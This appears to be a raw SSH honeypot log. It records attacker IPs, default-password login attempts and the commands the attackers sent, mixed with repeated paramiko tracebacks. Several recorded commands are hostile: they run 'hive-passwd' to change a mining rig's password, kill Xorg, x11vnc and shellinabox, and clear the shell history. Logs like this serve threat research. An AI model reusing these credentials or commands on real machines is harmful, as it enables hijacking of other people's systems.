2021-11-23 16:37:38,721 - root - INFO - New command from 195.133.18.24: b'sudo hive-passwd c3Rvcnl0aW1lIGRheW9uZSBhbmQgZGF5dHdevbase64; sudo pkill Xorg; sudo pkill x11vnc'
2021-11-23 16:39:54,075 - root - INFO - New connection from: 159.223.2.20
2021-11-23 16:39:54,094 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 16:39:54,332 - root - INFO - New client credentials from 159.223.2.20: username: user, password: 1
2021-11-23 16:39:54,332 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 16:39:54,394 - root - INFO - New command from 159.223.2.20: b'nproc;uname -a'
2021-11-23 16:40:56,959 - root - INFO - New connection from: 159.223.2.20
2021-11-23 16:40:56,960 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 16:40:57,126 - root - INFO - New client credentials from 159.223.2.20: username: user, password: 111111
2021-11-23 16:40:57,126 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 16:40:57,166 - root - INFO - New command from 159.223.2.20: b'nproc;uname -a'
2021-11-23 16:41:59,739 - root - INFO - New connection from: 159.223.2.20
2021-11-23 16:41:59,767 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 16:41:59,917 - root - INFO - New client credentials from 159.223.2.20: username: user, password: 000000
2021-11-23 16:41:59,917 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 16:41:59,956 - root - INFO - New command from 159.223.2.20: b'nproc;uname -a'
2021-11-23 16:42:09,938 - root - INFO - New connection from: 195.133.18.210
2021-11-23 16:42:09,939 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 16:42:09,939 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 16:42:09,940 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 16:42:09,940 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 16:42:09,940 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 16:42:09,940 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 16:42:09,940 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 16:42:09,940 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 16:42:09,940 - paramiko.transport - ERROR - EOFError
2021-11-23 16:42:09,940 - paramiko.transport - ERROR - 
2021-11-23 16:42:09,940 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 16:42:09,940 - paramiko.transport - ERROR - 
2021-11-23 16:42:09,940 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 16:42:09,940 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 16:42:09,940 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 16:42:09,940 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 16:42:09,940 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 16:42:09,940 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 16:42:09,940 - paramiko.transport - ERROR - 
2021-11-23 16:43:03,063 - root - INFO - New connection from: 159.223.2.20
2021-11-23 16:43:03,064 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 16:43:03,187 - root - INFO - New client credentials from 159.223.2.20: username: user, password: 0
2021-11-23 16:43:03,188 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 16:43:03,225 - root - INFO - New command from 159.223.2.20: b'nproc;uname -a'
2021-11-23 16:44:06,254 - root - INFO - New connection from: 159.223.2.20
2021-11-23 16:44:06,263 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 16:44:06,384 - root - INFO - New client credentials from 159.223.2.20: username: user, password: 1234
2021-11-23 16:44:06,384 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 16:44:06,420 - root - INFO - New command from 159.223.2.20: b'nproc;uname -a'
2021-11-23 16:45:08,487 - root - INFO - New connection from: 159.223.2.20
2021-11-23 16:45:08,488 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 16:45:08,600 - root - INFO - New client credentials from 159.223.2.20: username: user, password: 123
2021-11-23 16:45:08,600 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 16:45:08,636 - root - INFO - New command from 159.223.2.20: b'nproc;uname -a'
2021-11-23 16:45:18,620 - root - INFO - New connection from: 45.88.137.253
2021-11-23 16:45:18,621 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 16:45:18,621 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 16:45:18,621 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 16:45:18,621 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 16:45:18,621 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 16:45:18,621 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 16:45:18,621 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 16:45:18,621 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 16:45:18,621 - paramiko.transport - ERROR - EOFError
2021-11-23 16:45:18,621 - paramiko.transport - ERROR - 
2021-11-23 16:45:18,621 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 16:45:18,621 - paramiko.transport - ERROR - 
2021-11-23 16:45:18,621 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 16:45:18,621 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 16:45:18,621 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 16:45:18,621 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 16:45:18,621 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 16:45:18,621 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 16:45:18,622 - paramiko.transport - ERROR - 
2021-11-23 16:45:18,622 - root - INFO - New connection from: 45.88.137.253
2021-11-23 16:45:19,550 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 16:45:25,560 - paramiko.transport - ERROR - Socket exception: Connection reset by peer (104)
2021-11-23 16:45:25,561 - root - INFO - New connection from: 45.88.137.253
2021-11-23 16:45:25,562 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 16:45:25,563 - root - INFO - New connection from: 45.88.137.253
2021-11-23 16:45:25,564 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 16:45:25,564 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 16:45:25,564 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 16:45:25,564 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 16:45:25,565 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 16:45:25,565 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 16:45:25,565 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 16:45:25,565 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 16:45:25,565 - paramiko.transport - ERROR - EOFError
2021-11-23 16:45:25,565 - paramiko.transport - ERROR - 
2021-11-23 16:45:25,565 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 16:45:25,565 - paramiko.transport - ERROR - 
2021-11-23 16:45:25,565 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 16:45:25,565 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 16:45:25,565 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 16:45:25,565 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 16:45:25,565 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 16:45:25,565 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 16:45:25,565 - paramiko.transport - ERROR - 
2021-11-23 16:46:10,039 - root - INFO - New connection from: 159.223.2.20
2021-11-23 16:46:10,040 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 16:46:10,180 - root - INFO - New client credentials from 159.223.2.20: username: user, password: 12
2021-11-23 16:46:10,180 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 16:46:10,218 - root - INFO - New command from 159.223.2.20: b'nproc;uname -a'
2021-11-23 16:47:12,306 - root - INFO - New connection from: 159.223.2.20
2021-11-23 16:47:12,366 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 16:47:12,491 - root - INFO - New client credentials from 159.223.2.20: username: user, password: 12345
2021-11-23 16:47:12,491 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 16:47:12,530 - root - INFO - New command from 159.223.2.20: b'nproc;uname -a'
2021-11-23 16:48:13,751 - root - INFO - New connection from: 159.223.2.20
2021-11-23 16:48:13,752 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 16:48:13,927 - root - INFO - New client credentials from 159.223.2.20: username: user, password: 123456
2021-11-23 16:48:13,927 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 16:48:13,996 - root - INFO - New command from 159.223.2.20: b'nproc;uname -a'
2021-11-23 16:49:58,030 - root - INFO - New connection from: 23.183.81.249
2021-11-23 16:49:58,110 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 16:49:58,110 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 16:49:58,110 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 16:49:58,110 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 16:49:58,110 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 16:49:58,110 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 16:49:58,110 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 16:49:58,110 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 16:49:58,110 - paramiko.transport - ERROR - EOFError
2021-11-23 16:49:58,110 - paramiko.transport - ERROR - 
2021-11-23 16:49:58,110 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 16:49:58,110 - paramiko.transport - ERROR - 
2021-11-23 16:49:58,110 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 16:49:58,110 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 16:49:58,111 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 16:49:58,111 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 16:49:58,111 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 16:49:58,111 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 16:49:58,111 - paramiko.transport - ERROR - 
2021-11-23 16:51:09,745 - root - INFO - New connection from: 23.183.81.249
2021-11-23 16:51:09,747 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 16:51:10,949 - root - INFO - New client credentials from 23.183.81.249: username: user, password: 1
2021-11-23 16:51:10,949 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 16:51:11,426 - root - INFO - New command from 23.183.81.249: b'sudo hive-passwd `hostname`; echo `hostname`; pkill Xorg; pkill x11vnc; pkill Hello; systemctl stop shellinabox; history -c'
2021-11-23 16:53:06,440 - root - INFO - New connection from: 195.133.18.24
2021-11-23 16:53:06,460 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 16:53:06,460 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 16:53:06,460 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 16:53:06,460 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 16:53:06,460 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 16:53:06,460 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 16:53:06,460 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 16:53:06,460 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 16:53:06,460 - paramiko.transport - ERROR - EOFError
2021-11-23 16:53:06,460 - paramiko.transport - ERROR - 
2021-11-23 16:53:06,460 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 16:53:06,460 - paramiko.transport - ERROR - 
2021-11-23 16:53:06,460 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 16:53:06,460 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 16:53:06,460 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 16:53:06,460 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 16:53:06,460 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 16:53:06,460 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 16:53:06,461 - paramiko.transport - ERROR - 
2021-11-23 16:53:41,861 - root - INFO - New connection from: 195.133.18.24
2021-11-23 16:53:41,869 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 16:53:42,078 - root - INFO - New client credentials from 195.133.18.24: username: user, password: 1
2021-11-23 16:53:42,078 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 16:53:42,118 - root - INFO - New command from 195.133.18.24: b'sudo hive-passwd c3Rvcnl0aW1lIGRheW9uZSBhbmQgZGF5dHdevbase64; sudo pkill Xorg; sudo pkill x11vnc'
2021-11-23 16:55:34,879 - root - INFO - New connection from: 192.241.213.10
2021-11-23 16:55:34,999 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 16:59:17,358 - root - INFO - New connection from: 110.42.132.70
2021-11-23 16:59:17,359 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 16:59:17,359 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 16:59:17,359 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 16:59:17,359 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 16:59:17,359 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 16:59:17,359 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 16:59:17,359 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 16:59:17,359 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 16:59:17,359 - paramiko.transport - ERROR - EOFError
2021-11-23 16:59:17,359 - paramiko.transport - ERROR - 
2021-11-23 16:59:17,359 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 16:59:17,359 - paramiko.transport - ERROR - 
2021-11-23 16:59:17,359 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 16:59:17,360 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 16:59:17,360 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 16:59:17,360 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 16:59:17,360 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 16:59:17,360 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 16:59:17,360 - paramiko.transport - ERROR - 
2021-11-23 16:59:17,603 - root - INFO - New connection from: 110.42.132.70
2021-11-23 16:59:17,604 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 16:59:18,844 - paramiko.transport - INFO - Auth rejected (none).
2021-11-23 16:59:19,083 - root - INFO - New client credentials from 110.42.132.70: username: root, password: 123456
2021-11-23 16:59:19,084 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 16:59:19,583 - root - INFO - New command from 110.42.132.70: b'uname -a'
2021-11-23 17:04:30,834 - root - INFO - New connection from: 71.80.99.103
2021-11-23 17:04:30,978 - paramiko.transport - INFO - Connected (version 2.0, client libssh-0.5.2)
2021-11-23 17:04:31,733 - paramiko.transport - INFO - Auth rejected (none).
2021-11-23 17:04:31,876 - root - INFO - New client credentials from 71.80.99.103: username: root, password: nas4free
2021-11-23 17:04:31,876 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 17:04:32,159 - root - INFO - New command from 71.80.99.103: b'uname -a || echo -'
2021-11-23 17:21:04,083 - root - INFO - New connection from: 45.88.137.100
2021-11-23 17:21:07,776 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner[Errno 104] Connection reset by peer
2021-11-23 17:21:07,776 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 17:21:07,776 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 17:21:07,776 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 17:21:07,776 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 17:21:07,776 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 17:21:07,776 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 607, in _read_timeout
2021-11-23 17:21:07,776 - paramiko.transport - ERROR -     x = self.__socket.recv(128)
2021-11-23 17:21:07,776 - paramiko.transport - ERROR - ConnectionResetError: [Errno 104] Connection reset by peer
2021-11-23 17:21:07,776 - paramiko.transport - ERROR - 
2021-11-23 17:21:07,776 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 17:21:07,776 - paramiko.transport - ERROR - 
2021-11-23 17:21:07,776 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 17:21:07,776 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 17:21:07,776 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 17:21:07,776 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 17:21:07,777 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 17:21:07,777 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner[Errno 104] Connection reset by peer
2021-11-23 17:21:07,777 - paramiko.transport - ERROR - 
2021-11-23 17:21:07,832 - root - INFO - New connection from: 45.88.137.100
2021-11-23 17:21:14,081 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 17:21:20,256 - root - INFO - New connection from: 45.88.137.100
2021-11-23 17:21:20,257 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 17:21:22,507 - paramiko.transport - ERROR - Socket exception: Connection reset by peer (104)
2021-11-23 17:24:34,564 - root - INFO - New connection from: 14.143.49.206
2021-11-23 17:24:34,720 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner[Errno 104] Connection reset by peer
2021-11-23 17:24:34,720 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 17:24:34,720 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 17:24:34,720 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 17:24:34,720 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 17:24:34,720 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 17:24:34,720 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 607, in _read_timeout
2021-11-23 17:24:34,720 - paramiko.transport - ERROR -     x = self.__socket.recv(128)
2021-11-23 17:24:34,720 - paramiko.transport - ERROR - ConnectionResetError: [Errno 104] Connection reset by peer
2021-11-23 17:24:34,720 - paramiko.transport - ERROR - 
2021-11-23 17:24:34,720 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 17:24:34,720 - paramiko.transport - ERROR - 
2021-11-23 17:24:34,720 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 17:24:34,720 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 17:24:34,720 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 17:24:34,721 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 17:24:34,721 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 17:24:34,721 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner[Errno 104] Connection reset by peer
2021-11-23 17:24:34,721 - paramiko.transport - ERROR - 
2021-11-23 17:28:59,644 - root - INFO - New connection from: 104.244.72.120
2021-11-23 17:28:59,730 - paramiko.transport - INFO - Connected (version 2.0, client PuTTY_Release_0.63)
2021-11-23 17:29:00,414 - paramiko.transport - INFO - Auth rejected (none).
2021-11-23 17:53:25,553 - root - INFO - New connection from: 161.35.153.169
2021-11-23 17:53:25,573 - paramiko.transport - INFO - Connected (version 2.0, client libssh-0.1)
2021-11-23 17:53:25,766 - root - INFO - New client credentials from 161.35.153.169: username: root, password: password
2021-11-23 17:53:25,766 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 17:53:35,868 - root - INFO - New connection from: 161.35.153.169
2021-11-23 17:53:35,903 - paramiko.transport - INFO - Connected (version 2.0, client libssh-0.1)
2021-11-23 17:53:36,236 - root - INFO - New client credentials from 161.35.153.169: username: ubnt, password: ubnt
2021-11-23 17:53:36,236 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 18:05:26,095 - root - INFO - New connection from: 120.29.226.5
2021-11-23 18:05:26,358 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 18:05:26,359 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 18:05:26,359 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 18:05:26,359 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 18:05:26,359 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 18:05:26,359 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 18:05:26,359 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 18:05:26,359 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 18:05:26,359 - paramiko.transport - ERROR - EOFError
2021-11-23 18:05:26,359 - paramiko.transport - ERROR - 
2021-11-23 18:05:26,359 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 18:05:26,359 - paramiko.transport - ERROR - 
2021-11-23 18:05:26,359 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 18:05:26,359 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 18:05:26,359 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 18:05:26,360 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 18:05:26,360 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 18:05:26,360 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 18:05:26,360 - paramiko.transport - ERROR - 
2021-11-23 18:10:18,687 - root - INFO - New connection from: 162.142.125.44
2021-11-23 18:10:18,689 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 18:19:59,708 - root - INFO - New connection from: 209.141.33.193
2021-11-23 18:19:59,873 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 18:19:59,873 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 18:19:59,873 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 18:19:59,873 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 18:19:59,873 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 18:19:59,873 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 18:19:59,873 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 18:19:59,873 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 18:19:59,873 - paramiko.transport - ERROR - EOFError
2021-11-23 18:19:59,874 - paramiko.transport - ERROR - 
2021-11-23 18:19:59,874 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 18:19:59,874 - paramiko.transport - ERROR - 
2021-11-23 18:19:59,874 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 18:19:59,874 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 18:19:59,874 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 18:19:59,874 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 18:19:59,874 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 18:19:59,874 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 18:19:59,874 - paramiko.transport - ERROR - 
2021-11-23 18:20:29,867 - root - INFO - New connection from: 209.141.33.193
2021-11-23 18:20:29,868 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 18:20:30,669 - root - INFO - New client credentials from 209.141.33.193: username: user, password: 1
2021-11-23 18:20:30,669 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 18:20:30,967 - root - INFO - New command from 209.141.33.193: b'sudo'
2021-11-23 19:02:46,452 - root - INFO - New connection from: 66.240.236.116
2021-11-23 19:02:46,457 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 19:25:26,368 - root - INFO - New connection from: 170.246.71.206
2021-11-23 19:25:26,378 - paramiko.transport - INFO - Connected (version 2.0, client libssh_0.9.5)
2021-11-23 19:25:29,010 - root - INFO - New client credentials from 170.246.71.206: username: root, password: root
2021-11-23 19:25:29,010 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 19:25:36,018 - root - INFO - New connection from: 170.246.71.206
2021-11-23 19:25:36,019 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 19:25:36,019 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 19:25:36,020 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 19:25:36,020 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 19:25:36,020 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 19:25:36,020 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 19:25:36,020 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 19:25:36,020 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 19:25:36,020 - paramiko.transport - ERROR - EOFError
2021-11-23 19:25:36,020 - paramiko.transport - ERROR - 
2021-11-23 19:25:36,020 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 19:25:36,020 - paramiko.transport - ERROR - 
2021-11-23 19:25:36,020 - paramiko.transport - ERROR - Traceback (most recent call last):
